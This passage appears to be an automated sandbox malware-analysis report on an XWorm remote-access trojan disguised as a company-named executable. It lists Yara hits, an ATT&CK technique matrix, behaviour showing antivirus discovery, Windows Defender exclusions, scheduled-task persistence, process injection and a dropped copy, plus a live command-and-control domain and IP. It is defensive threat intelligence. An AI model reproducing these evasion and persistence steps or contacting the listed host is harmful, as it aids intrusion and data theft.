              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		111
              Process Injection              		1
              Masquerading              		1
              Input Capture              		121
              Security Software Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		21
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		1
              DLL Side-Loading              		21
              Registry Run Keys / Startup Folder              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		111
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture21
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545926 Sample: SS Bottmac Engineers Pvt. L... Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 75 kanrplest.duckdns.org 2->75 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 87 18 other signatures 2->87 9 SS Bottmac Engineers Pvt. Ltd..exe 7 2->9         started        13 RTUZKYTc.exe 5 2->13         started        15 SS Bottmac Engineers Pvt. Ltd..exe 2->15         started        17 SS Bottmac Engineers Pvt. Ltd..exe 2->17         started        signatures3 85 Uses dynamic DNS services 75->85 process4 file5 67 C:\Users\user\AppData\Roaming\RTUZKYTc.exe, PE32 9->67 dropped 69 C:\Users\...\RTUZKYTc.exe:Zone.Identifier, ASCII 9->69 dropped 71 C:\Users\user\AppData\Local\...\tmp960E.tmp, XML 9->71 dropped 73 C:\...\SS Bottmac Engineers Pvt. Ltd..exe.log, ASCII 9->73 dropped 95 Adds a directory exclusion to Windows Defender 9->95 97 Injects a PE file into a foreign processes 9->97 19 SS Bottmac Engineers Pvt. Ltd..exe 1 7 9->19         started        24 powershell.exe 23 9->24         started        26 powershell.exe 23 9->26         started        28 schtasks.exe 1 9->28         started        99 Multi AV Scanner detection for dropped file 13->99 101 Machine Learning detection for dropped file 13->101 30 schtasks.exe 13->30         started        32 RTUZKYTc.exe 13->32         started        34 schtasks.exe 15->34         started        36 2 other processes 15->36 38 3 other processes 17->38 signatures6 process7 dnsIp8 77 kanrplest.duckdns.org 104.223.35.76, 4068, 49764, 49789 ASN-QUADRANET-GLOBALUS United States 19->77 65 C:\...\SS Bottmac Engineers Pvt. Ltd..exe, PE32 19->65 dropped 89 Adds a directory exclusion to Windows Defender 19->89 40 powershell.exe 19->40         started        43 powershell.exe 19->43         started        45 powershell.exe 19->45         started        91 Loading BitLocker PowerShell Module 24->91 47 conhost.exe 24->47         started        49 conhost.exe 26->49         started        51 conhost.exe 28->51         started        53 conhost.exe 30->53         started        55 conhost.exe 34->55         started        57 conhost.exe 38->57         started        file9 signatures10 process11 signatures12 93 Loading BitLocker PowerShell Module 40->93 59 conhost.exe 40->59         started        61 conhost.exe 43->61         started        63 conhost.exe 45->63         started        process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SS Bottmac Engineers Pvt. Ltd..exe39%ReversingLabsWin32.Trojan.Leonem
              SS Bottmac Engineers Pvt. Ltd..exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\RTUZKYTc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\RTUZKYTc.exe39%ReversingLabsWin32.Trojan.Leonem
              C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe39%ReversingLabsWin32.Trojan.Leonem

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              kanrplest.duckdns.org
              		104.223.35.76
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                kanrplest.duckdns.orgtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.micropowershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/DataSet1.xsdSS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drfalse
                      		unknown
                      https://contoso.com/powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.223.35.76
                        		kanrplest.duckdns.orgUnited States
                        		8100ASN-QUADRANET-GLOBALUStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1545926
                        Start date and time:2024-10-31 10:30:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:34
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SS Bottmac Engineers Pvt. Ltd..exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@43/32@13/1
                        EGA Information:
                        • Successful, ratio: 72.7%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 385
                        • Number of non-executed functions: 45
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target RTUZKYTc.exe, PID 7728 because it is empty
                        • Execution Graph export aborted for target SS Bottmac Engineers Pvt. Ltd..exe, PID 7196 because it is empty
                        • Execution Graph export aborted for target SS Bottmac Engineers Pvt. Ltd..exe, PID 7676 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
